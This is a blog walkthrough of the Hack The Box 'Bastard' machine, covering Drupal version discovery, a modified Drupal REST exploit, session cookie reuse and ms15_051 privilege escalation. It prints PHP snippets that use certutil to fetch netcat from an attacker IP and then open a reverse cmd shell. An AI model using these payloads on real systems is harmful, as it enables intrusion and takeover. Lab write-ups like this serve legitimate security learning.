Post

HTB Bastard: Walkthrough

Posted Updated
Preview Image
By partyh4t
2 min read
HTB Bastard: Walkthrough

image

  • We’re first met with a web application running Drupal that leaks a useful directory through the robots.txt file.
  • The file contains a version# for the current Drupal installation that is running on the web server.
  • We’re then able to leverage that version number to exploit a CVE to gain credentials and eventually RCE.
  • Finally, once the machine was compromised, we exploited ms15_051 to gain Administrative Privileges.

0) Machine Overview

  1. Scans
  2. Web Enumeration
  3. Exploitation
  4. Privilege Escalation

1) Scans

image

2) Web Enumeration

Heading to the webpage, we’re met with Drupal image

With some testing, and checking the robots.txt, we notice:

image

As we can see, we now know the exact version number of the CMS being used. image

3) Exploitation

With some research “Drupal 7.54 exploit” we instantly are met with: image

We used the exploit, but we had to alter some of the code: Originally I only changed the url to the proper IP, and as we can see, the endpoint_path is set to /rest-endpoint, but the exploit doesn’t work. image

So if we try to access that endpoint ourselves, it turns out it doesnt exist for us.

image

What if we try just /rest? Because if we search up that error with drupal, we can see some stackoverflow questions that show that /rest is also a possible endpoint.

With that fixed:

image

Now, the exploit is creating a .php file within the server, and the exploit code is retrieving credentials: image

Also the session information:

image

So we can either log into the admin dashboard and investigate, or we can also change the data to maybe give us a shell of some sort, it’d have to be in php though.

Lets first try to add some of those cookies into our browser: image

Here, we put the session names value into the name section, and the id into the value: image

I was having trouble trying to get a rev shell with the exploit code, so we’ll have to do it manually.

Going to be following this: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/drupal#rce

Note: this will only work for versions of Drupal before V8.

So, after a lot of research, and some PHP errors, I was able to use this code on the new page within the “Add-content” section:

1
2
3
4
5

<?php
$command = "certutil.exe -urlcache -f http://10.10.14.15:8080/nc64.exe nc64.exe";
$output = shell_exec($command);
echo $output;
?>

And then to execute it: (Turns out shell_exec is exactly what I needed in this case)

1
2
3

<?php
shell_exec('nc64.exe -e cmd 10.10.14.15 1234')
?>

4) Privilege Escalation

Now that we had access to the machine, i uploaded a meterpreter executable so i can use metasploit.

Once that was done, i ran local_exploit_suggester on the target, and was given multiple exploits that the target seemed to be vulnerable to.

I tried multiple, however the one that worked was ms15_051. Using the metasploit module for it, i just had to make sure the payload was set to windows/x64/meterpreter/reverse_tcp, stressing on the x64 as without it, it wouldnt work. Also made sure the target was set to Windows x64, and the original meterpreter session was migrated to an x64 process.

Pwned.

HTB
HTB Drupal CVE
This post is licensed under CC BY 4.0 by the author.